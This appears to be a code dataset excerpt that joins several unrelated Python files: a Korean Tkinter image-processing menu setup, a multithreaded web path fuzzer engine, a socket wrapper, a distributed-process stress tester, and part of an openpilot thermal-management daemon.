for i in range(0, outW):
for k in range(0, outH):
xs = i;
ys = k
xd = int(math.cos(radian) * (xs - cx)
- math.sin(radian) * (ys - cy)) + cx
yd = int(math.sin(radian) * (xs - cx)
+ math.cos(radian) * (ys - cy)) + cy
# if 0 <= xd < outW and 0 <= yd < outH :
if 0 <= xd < outW and 0 <= yd < outH:
outImage[xs][ys] = inImage2[xd][yd]
else:
outImage[xs][ys] = 255
###############################
display()
## 전역 변수부
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
VIEW_X, VIEW_Y = 128, 128
status = None
## 메인 코드부
window = Tk(); window.geometry('200x100');
window.title('영상 처리&데이터 분석 Ver 1.0 (RC1)')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
status = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_separator()
pixelMenu.add_command(label='밝게하기', command=lambda: addImage(1)) #덧셈
pixelMenu.add_command(label='어둡게하기', command=lambda: addImage(2)) #뺄셈
pixelMenu.add_command(label='밝게하기(뚜렷하게)', command=lambda: addImage(3)) #곱셈
pixelMenu.add_command(label='어둡게하기(희미하게)', command=lambda: addImage(4)) #나눗셈
pixelMenu.add_separator()
pixelMenu.add_command(label='영상합성', command=morphing)
areaMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소영역처리', menu=areaMenu)
areaMenu.add_command(label='엠보싱', command=embossing)
areaMenu.add_command(label='블러링', command=blurr)
areaMenu.add_command(label='샤프닝', command=sharp)
areaMenu.add_command(label='경계선추출(고주파)', command=edge1)
areaMenu.add_command(label='경계선추출(수직에지)', command=edge2)
areaMenu.add_command(label='경계선추출(수평에지)', command=edge3)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='좌우반전', command=LRReversalImage)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
geoMenu.add_command(label='화면확대-전방향', command=zoomInForW)
# geoMenu.add_command(label='화면확대-역방향(이웃 화소 보간법)', command=zoomInBackW) ##결과 이상하게 나옴 {작업 중}
geoMenu.add_separator()
geoMenu.add_command(label='영상회전(포워딩)', command=rotate1)
geoMenu.add_command(label='영상회전(백워딩 및 중앙)', command=rotate2)
geoMenu.add_command(label='영상회전(확대)', command=rotate3)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=lambda: analyzeData(1))
analyzeMenu.add_command(label='입출력 시 최대값, 최소값', command=lambda: analyzeData(2))
analyzeMenu.add_separator()
analyzeMenu.add_command(label='히스토그램', command=a_histogram)
analyzeMenu.add_command(label='히스토그램(matplotlib)', command=a_histogram2)
analyzeMenu.add_separator()
analyzeMenu.add_command(label='히스토그램 스트래칭', command=a_histoStretch)
analyzeMenu.add_command(label='엔드-인 탐색', command=a_endInSearch)
analyzeMenu.add_command(label='히스토그램 평활화', command=a_histoEqual)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
otherMenu.add_separator()
otherMenu.add_command(label='Excel로 내보내기(숫자)', command=saveExcel1)
otherMenu.add_command(label='Excel로 내보내기(음영)', command=saveExcel2)
#작업 하기
# Day11-04 Self-Study 과제 : 엑셀 파일에서 읽어오기
window.mainloop()
|
fuzzer.py
|
# -*- coding: utf-8 -*-
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
# Author: Mauro Soria
import threading
import time
from lib.connection.request_exception import RequestException
from .path import Path
from .scanner import Scanner
class Fuzzer(object):
def __init__(
self,
requester,
dictionary,
suffixes=None,
prefixes=None,
exclude_response=None,
threads=1,
delay=0,
maxrate=0,
match_callbacks=[],
not_found_callbacks=[],
error_callbacks=[],
):
self.requester = requester
self.dictionary = dictionary
self.suffixes = suffixes if suffixes else []
self.prefixes = prefixes if prefixes else []
self.exclude_response = exclude_response
self.base_path = self.requester.base_path
self.threads = []
self.threads_count = (
threads if len(self.dictionary) >= threads else len(self.dictionary)
)
self.delay = delay
self.maxrate = maxrate
self.running = False
self.calibration = None
self.default_scanner = None
self.match_callbacks = match_callbacks
self.not_found_callbacks = not_found_callbacks
self.error_callbacks = error_callbacks
self.matches = []
self.scanners = {
"prefixes": {},
"suffixes": {},
}
def wait(self, timeout=None):
for thread in self.threads:
thread.join(timeout)
if timeout and thread.is_alive():
return False
return True
def rate_adjuster(self):
while not self.wait(0.15):
self.stand_rate = self.rate
def setup_scanners(self):
if len(self.scanners):
self.scanners = {
"prefixes": {},
"suffixes": {},
}
# Default scanners (wildcard testers)
self.default_scanner = Scanner(self.requester)
self.prefixes.append(".")
self.suffixes.append("/")
for prefix in self.prefixes:
self.scanners["prefixes"][prefix] = Scanner(
self.requester, prefix=prefix, tested=self.scanners
)
for suffix in self.suffixes:
self.scanners["suffixes"][suffix] = Scanner(
self.requester, suffix=suffix, tested=self.scanners
)
for extension in self.dictionary.extensions:
if "." + extension not in self.scanners["suffixes"]:
self.scanners["suffixes"]["." + extension] = Scanner(
self.requester, suffix="." + extension, tested=self.scanners
)
if self.exclude_response:
if self.exclude_response.startswith("/"):
self.exclude_response = self.exclude_response[1:]
self.calibration = Scanner(
self.requester, calibration=self.exclude_response, tested=self.scanners
)
def setup_threads(self):
if len(self.threads):
self.threads = []
for thread in range(self.threads_count):
new_thread = threading.Thread(target=self.thread_proc)
new_thread.daemon = True
self.threads.append(new_thread)
def get_scanner_for(self, path):
# Clean the path, so can check for extensions/suffixes
path = path.split("?")[0].split("#")[0]
if self.exclude_response:
yield self.calibration
for prefix in self.prefixes:
if path.startswith(prefix):
yield self.scanners["prefixes"][prefix]
for suffix in self.suffixes:
if path.endswith(suffix):
yield self.scanners["suffixes"][suffix]
for extension in self.dictionary.extensions:
if path.endswith("." + extension):
yield self.scanners["suffixes"]["." + extension]
yield self.default_scanner
def start(self):
self.setup_scanners()
self.setup_threads()
self.index = 0
self.rate = 0
self.stand_rate = 0
self.dictionary.reset()
self.running_threads_count = len(self.threads)
self.running = True
self.paused = False
self.play_event = threading.Event()
self.paused_semaphore = threading.Semaphore(0)
self.play_event.clear()
for thread in self.threads:
thread.start()
threading.Thread(target=self.rate_adjuster, daemon=True).start()
self.play()
def play(self):
self.play_event.set()
def pause(self):
self.paused = True
self.play_event.clear()
for thread in self.threads:
if thread.is_alive():
self.paused_semaphore.acquire()
def resume(self):
self.paused = False
self.paused_semaphore.release()
self.play()
def stop(self):
self.running = False
self.play()
def scan(self, path):
response = self.requester.request(path)
result = response.status
for tester in list(set(self.get_scanner_for(path))):
if not tester.scan(path, response):
result = None
break
return result, response
def is_paused(self):
return self.paused
def is_running(self):
return self.running
def finish_threads(self):
self.running = False
self.finished_event.set()
def is_stopped(self):
return self.running_threads_count == 0
def decrease_threads(self):
self.running_threads_count -= 1
def increase_threads(self):
self.running_threads_count += 1
def decrease_rate(self):
self.rate -= 1
def increase_rate(self):
self.rate += 1
threading.Timer(1, self.decrease_rate).start()
def thread_proc(self):
self.play_event.wait()
try:
path = next(self.dictionary)
while path:
try:
# Pause if the request rate exceeded the maximum
while self.maxrate and self.rate >= self.maxrate:
pass
self.increase_rate()
status, response = self.scan(path)
result = Path(path=path, status=status, response=response)
if status:
self.matches.append(result)
for callback in self.match_callbacks:
callback(result)
else:
for callback in self.not_found_callbacks:
callback(result)
except RequestException as e:
for callback in self.error_callbacks:
callback(path, e.args[0]["message"])
continue
finally:
if not self.play_event.is_set():
self.decrease_threads()
self.paused_semaphore.release()
self.play_event.wait()
self.increase_threads()
path = next(self.dictionary) # Raises StopIteration when finishes
if not self.running:
break
time.sleep(self.delay)
except StopIteration:
pass
|
socket.py
|
# ============================================================================
# FILE: socket.py
# AUTHOR: Rafael Bodill <justRafi at gmail.com>
# License: MIT license
# ============================================================================
import socket
from threading import Thread
from queue import Queue
from time import time, sleep
class Socket(object):
def __init__(self, host, port, commands, context, timeout):
self._enc = context.get('encoding', 'utf-8')
self._eof = False
self._outs = []
self._timeout = timeout
self._context = context
self._sock = self.connect(host, port, self._timeout)
self._welcome = self.receive()
self.sendall(commands)
self._queue_out = Queue()
self._thread = Thread(target=self.enqueue_output)
self._thread.start()
@property
def welcome(self):
return self._welcome
def eof(self):
return self._eof
def kill(self):
if self._sock is not None:
self._sock.close()
self._sock = None
self._queue_out = None
self._thread.join(1.0)
self._thread = None
def sendall(self, commands):
for command in commands:
self._sock.sendall('{}\n'.format(command).encode(self._enc))
def receive(self, bytes=1024):
return self._sock.recv(bytes).decode(
self._enc, errors='replace')
def connect(self, host, port, timeout):
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, socket.IPPROTO_TCP,
socket.AI_ADDRCONFIG):
family, socket_type, proto, canon_name, sa = res
sock = None
try:
sock = socket.socket(family, socket_type, proto)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
sock.settimeout(timeout)
sock.connect(sa)
return sock
except socket.error as e:
if sock is not None:
sock.close()
if e is not None:
raise e
else:
raise OSError('Socket: getaddrinfo returns an empty list')
def enqueue_output(self):
if not self._queue_out:
return
buffer = self.receive(2048)
buffering = True
while buffering:
if '\n' in buffer:
(line, buffer) = buffer.split('\n', 1)
self._queue_out.put(line)
else:
more = self.receive()
if not more:
buffering = False
else:
buffer += more
def communicate(self, timeout):
if not self._sock:
return []
start = time()
outs = []
if self._queue_out.empty():
sleep(0.1)
while not self._queue_out.empty() and time() < start + timeout:
outs.append(self._queue_out.get_nowait())
if self._thread.is_alive() or not self._queue_out.empty():
return outs
self._eof = True
self._sock = None
self._thread = None
self._queue = None
return outs
|
stress_.py
|
#!/usr/bin/env python3
import argparse
import os, atexit
import textwrap
import time
import threading, subprocess
import signal
import random
import time
from enum import Enum
from collections import defaultdict, OrderedDict
PROCESSES_BASE_IP = 11000
class ProcessState(Enum):
RUNNING = 1
STOPPED = 2
TERMINATED = 3
class ProcessInfo:
def __init__(self, handle):
self.lock = threading.Lock()
self.handle = handle
self.state = ProcessState.RUNNING
@staticmethod
def stateToSignal(state):
if state == ProcessState.RUNNING:
return signal.SIGCONT
if state == ProcessState.STOPPED:
return signal.SIGSTOP
if state == ProcessState.TERMINATED:
return signal.SIGTERM
@staticmethod
def stateToSignalStr(state):
if state == ProcessState.RUNNING:
return "SIGCONT"
if state == ProcessState.STOPPED:
return "SIGSTOP"
if state == ProcessState.TERMINATED:
return "SIGTERM"
@staticmethod
def validStateTransition(current, desired):
if current == ProcessState.TERMINATED:
return False
if current == ProcessState.RUNNING:
return desired == ProcessState.STOPPED or desired == ProcessState.TERMINATED
if current == ProcessState.STOPPED:
return desired == ProcessState.RUNNING
return False
class AtomicSaturatedCounter:
def __init__(self, saturation, initial=0):
self._saturation = saturation
self._value = initial
self._lock = threading.Lock()
def reserve(self):
with self._lock:
if self._value < self._saturation:
self._value += 1
return True
else:
return False
class Validation:
def __init__(self, procs, msgs):
self.processes = procs
self.messages = msgs
def generatePerfectLinksConfig(self, directory):
hostsfile = os.path.join(directory, 'hosts')
configfile = os.path.join(directory, 'config')
with open(hostsfile, 'w') as hosts:
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP+i))
with open(configfile, 'w') as config:
config.write("{} 1\n".format(self.messages))
return (hostsfile, configfile)
def generateFifoConfig(self, directory):
hostsfile = os.path.join(directory, 'hosts')
configfile = os.path.join(directory, 'config')
with open(hostsfile, 'w') as hosts:
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP+i))
with open(configfile, 'w') as config:
config.write("{}\n".format(self.messages))
return (hostsfile, configfile)
def generateLcausalConfig(self, directory):
hostsfile = os.path.join(directory, 'hosts')
configfile = os.path.join(directory, 'config')
with open(hostsfile, 'w') as hosts:
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP+i))
with open(configfile, 'w') as config:
config.write("{}\n".format(self.messages))
for i in range(1, self.processes + 1):
others = list(range(1, self.processes + 1))
others.remove(i)
random.shuffle(others)
if len(others) // 2 > 0:
others = others[0: len(others) // 2]
config.write("{} {}\n".format(i, ' '.join(map(str, others))))
return (hostsfile, configfile)
class StressTest:
def __init__(self, procs, concurrency, attempts, attemptsRatio):
self.processes = len(procs)
self.processesInfo = dict()
for (logicalPID, handle) in procs:
self.processesInfo[logicalPID] = ProcessInfo(handle)
self.concurrency = concurrency
self.attempts = attempts
self.attemptsRatio = attemptsRatio
maxTerminatedProcesses = self.processes // 2 if self.processes % 2 == 1 else (self.processes - 1) // 2
self.terminatedProcs = AtomicSaturatedCounter(maxTerminatedProcesses)
def stress(self):
selectProc = list(range(1, self.processes+1))
random.shuffle(selectProc)
selectOp = [ProcessState.STOPPED] * int(1000 * self.attemptsRatio['STOP']) + \
[ProcessState.RUNNING] * int(1000 * self.attemptsRatio['CONT']) + \
[ProcessState.TERMINATED] * int(1000 * self.attemptsRatio['TERM'])
random.shuffle(selectOp)
successfulAttempts = 0
while successfulAttempts < self.attempts:
proc = random.choice(selectProc)
op = random.choice(selectOp)
info = self.processesInfo[proc]
with info.lock:
if ProcessInfo.validStateTransition(info.state, op):
if op == ProcessState.TERMINATED:
reserved = self.terminatedProcs.reserve()
if reserved:
selectProc.remove(proc)
else:
continue
time.sleep(float(random.randint(50, 500)) / 1000.0)
info.handle.send_signal(ProcessInfo.stateToSignal(op))
info.state = op
successfulAttempts += 1
print("Sending {} to process {}".format(ProcessInfo.stateToSignalStr(op), proc))
# if op == ProcessState.TERMINATED and proc not in terminatedProcs:
# if len(terminatedProcs) < maxTerminatedProcesses:
# terminatedProcs.add(proc)
# if len(terminatedProcs) == maxTerminatedProcesses:
# break
def remainingUnterminatedProcesses(self):
remaining = []
for pid, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
remaining.append(pid)
return None if len(remaining) == 0 else remaining
def terminateAllProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(ProcessInfo.stateToSignal(ProcessState.RUNNING))
info.handle.send_signal(ProcessInfo.stateToSignal(ProcessState.TERMINATED))
return False
def continueStoppedProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(ProcessInfo.stateToSignal(ProcessState.RUNNING))
def run(self):
if self.concurrency > 1:
threads = [threading.Thread(target=self.stress) for _ in range(self.concurrency)]
[p.start() for p in threads]
[p.join() for p in threads]
else:
self.stress()
def startProcesses(processes, runscript, hostsFilePath, configFilePath, outputDir):
runscriptPath = os.path.abspath(runscript)
if not os.path.isfile(runscriptPath):
raise Exception("`{}` is not a file".format(runscriptPath))
if os.path.basename(runscriptPath) != 'run.sh':
raise Exception("`{}` is not a runscript".format(runscriptPath))
outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(outputDirPath):
raise Exception("`{}` is not a directory".format(outputDirPath))
baseDir, _ = os.path.split(runscriptPath)
bin_cpp = os.path.join(baseDir, "bin", "da_proc")
bin_java = os.path.join(baseDir, "bin", "da_proc.jar")
if os.path.exists(bin_cpp):
cmd = [bin_cpp]
elif os.path.exists(bin_java):
cmd = ['java', '-jar', bin_java]
else:
raise Exception("`{}` could not find a binary to execute. Make sure you build before validating".format(runscriptPath))
procs = []
for pid in range(1, processes+1):
cmd_ext = ['--id', str(pid),
'--hosts', hostsFilePath,
'--output', os.path.join(outputDirPath, 'proc{:02d}.output'.format(pid)),
configFilePath]
stdoutFd = open(os.path.join(outputDirPath, 'proc{:02d}.stdout'.format(pid)), "w")
stderrFd = open(os.path.join(outputDirPath, 'proc{:02d}.stderr'.format(pid)), "w")
procs.append((pid, subprocess.Popen(cmd + cmd_ext, stdout=stdoutFd, stderr=stderrFd)))
return procs
def main(processes, messages, runscript, testType, logsDir, testConfig):
if not os.path.isdir(logsDir):
raise ValueError('Directory `{}` does not exist'.format(logsDir))
validation = Validation(processes, messages)
if testType == "perfect":
hostsFile, configFile = validation.generatePerfectLinksConfig(logsDir)
elif testType == "fifo":
hostsFile, configFile = validation.generateFifoConfig(logsDir)
elif testType == "lcausal":
hostsFile, configFile = validation.generateLcausalConfig(logsDir)
else:
raise ValueError('Unrecognised test type')
try:
# Start the processes and get their PIDs
procs = startProcesses(processes, runscript, hostsFile, configFile, logsDir)
# Create the stress test
st = StressTest(procs,
testConfig['concurrency'],
testConfig['attempts'],
testConfig['attemptsDistribution'])
for (logicalPID, procHandle) in procs:
print("Process with logicalPID {} has PID {}".format(logicalPID, procHandle.pid))
st.run()
print("StressTest is complete.")
print("Resuming stopped processes.")
st.continueStoppedProcesses()
input("Press `Enter` when all processes have finished processing messages.")
unterminated = st.remainingUnterminatedProcesses()
if unterminated is not None:
st.terminateAllProcesses()
mutex = threading.Lock()
def waitForProcess(logicalPID, procHandle, mutex):
procHandle.wait()
with mutex:
print("Process {} exited with {}".format(logicalPID, procHandle.returncode))
# Monitor which processes have exited
monitors = [threading.Thread(target=waitForProcess, args=(logicalPID, procHandle, mutex)) for (logicalPID, procHandle) in procs]
[p.start() for p in monitors]
[p.join() for p in monitors]
finally:
if procs is not None:
for _, p in procs:
p.kill()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-r",
"--runscript",
required=True,
dest="runscript",
help="Path to run.sh",
)
parser.add_argument(
"-t",
"--test",
choices=["perfect", "fifo", "lcausal"],
required=True,
dest="testType",
help="Which test to run",
)
parser.add_argument(
"-l",
"--logs",
required=True,
dest="logsDir",
help="Directory to store stdout, stderr and outputs generated by the processes",
)
parser.add_argument(
"-p",
"--processes",
required=True,
type=int,
dest="processes",
help="Number of processes that broadcast",
)
parser.add_argument(
"-m",
"--messages",
required=True,
type=int,
dest="messages",
help="Maximum number (because it can crash) of messages that each process can broadcast",
)
results = parser.parse_args()
testConfig = {
'concurrency' : 8, # How many threads are interferring with the running processes
'attempts' : 8, # How many interferring attempts each threads does
'attemptsDistribution' : { # Probability with which an interferring thread will
'STOP': 0.48, # select an interferring action (make sure they add up to 1)
'CONT': 0.48,
'TERM':0.04
}
}
main(results.processes, results.messages, results.runscript, results.testType, results.logsDir, testConfig)
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
from smbus2 import SMBus
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.numpy_fast import interp
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.controls.lib.pid import PIController
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps', 'wifi_address'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
def read_tz(x):
if x is None:
return 0
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def setup_eon_fan():
os.system("echo 2 > /sys/module/dwc3_msm/parameters/otg_switch")
last_eon_fan_val = None
def set_eon_fan(val):
global last_eon_fan_val
if last_eon_fan_val is None or last_eon_fan_val != val:
bus = SMBus(7, force=True)
try:
i = [0x1, 0x3 | 0, 0x3 | 0x08, 0x3 | 0x10][val]
bus.write_i2c_block_data(0x3d, 0, [i])
except OSError:
# tusb320
if val == 0:
bus.write_i2c_block_data(0x67, 0xa, [0])
else:
bus.write_i2c_block_data(0x67, 0xa, [0x20])
bus.write_i2c_block_data(0x67, 0x8, [(val - 1) << 6])
bus.close()
last_eon_fan_val = val
# temp thresholds to control fan speed - high hysteresis
_TEMP_THRS_H = [50., 65., 80., 10000]
# temp thresholds to control fan speed - low hysteresis
_TEMP_THRS_L = [42.5, 57.5, 72.5, 10000]
# fan speed options
_FAN_SPEEDS = [0, 16384, 32768, 65535]
def handle_fan_eon(controller, max_cpu_temp, fan_speed, ignition):
new_speed_h = next(speed for speed, temp_h in zip(_FAN_SPEEDS, _TEMP_THRS_H) if temp_h > max_cpu_temp)
new_speed_l = next(speed for speed, temp_l in zip(_FAN_SPEEDS, _TEMP_THRS_L) if temp_l > max_cpu_temp)
if new_speed_h > fan_speed:
# update speed if using the high thresholds results in fan speed increment
fan_speed = new_speed_h
elif new_speed_l < fan_speed:
# update speed if using the low thresholds results in fan speed decrement
fan_speed = new_speed_l
set_eon_fan(fan_speed // 16384)
return fan_speed
def handle_fan_uno(controller, max_cpu_temp, fan_speed, ignition):
new_speed = int(interp(max_cpu_temp, [40.0, 80.0], [0, 80]))
if not ignition:
new_speed = min(30, new_speed)
return new_speed
last_ignition = False
def handle_fan_tici(controller, max_cpu_temp, fan_speed, ignition):
global last_ignition
controller.neg_limit = -(80 if ignition else 30)
controller.pos_limit = -(30 if ignition else 0)
if ignition != last_ignition:
controller.reset()
fan_pwr_out = -int(controller.update(
setpoint=75,
measurement=max_cpu_temp,
feedforward=interp(max_cpu_temp, [60.0, 100.0], [0, -80])
))
last_ignition = ignition
return fan_pwr_out
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
hw_state = HardwareState(
network_type=network_type,
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=HARDWARE.get_modem_temperatures(),
wifi_address=HARDWARE.get_ip_address(),
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
except Exception:
cloudlog.exception("Error getting network status")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
fan_speed = 0
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
wifi_address='N/A',
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
handle_fan = None
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
restart_triggered_ts = 0.
panda_state_ts = 0.
# TODO: use PI controller for UNO
controller = PIController(k_p=0, k_i=2e-3, neg_limit=-80, pos_limit=0, rate=(1 / DT_TRML))
is_openpilot_view_enabled = 0
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
# neokii
if sec_since_boot() - restart_triggered_ts < 5.:
onroad_conditions["not_restart_triggered"] = False
else:
onroad_conditions["not_restart_triggered"] = True
if params.get_bool("SoftRestartTriggered"):
params.put_bool("SoftRestartTriggered", False)
restart_triggered_ts = sec_since_boot()
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
if pandaState.pandaType != log.PandaState.PandaType.unknown:
panda_state_ts = sec_since_boot()
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if handle_fan is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
cloudlog.info("Setting up TICI fan handler")
handle_fan = handle_fan_tici
elif is_uno or PC:
cloudlog.info("Setting up UNO fan handler")
handle_fan = handle_fan_uno
else:
cloudlog.info("Setting up EON fan handler")
#setup_eon_fan()
#handle_fan = handle_fan_eon
elif params.get_bool("IsOpenpilotViewEnabled") and is_openpilot_view_enabled == 0:
is_openpilot_view_enabled = 1
onroad_conditions["ignition"] = True
elif not params.get_bool("IsOpenpilotViewEnabled") and is_openpilot_view_enabled == 1:
is_openpilot_view_enabled = 0
onroad_conditions["ignition"] = False
#else:
# if sec_since_boot() - panda_state_ts > 3.:
# if onroad_conditions["ignition"]:
# cloudlog.error("Lost panda connection while onroad")
# onroad_conditions["ignition"] = False
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.wifiIpAddress = last_hw_state.wifi_address
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
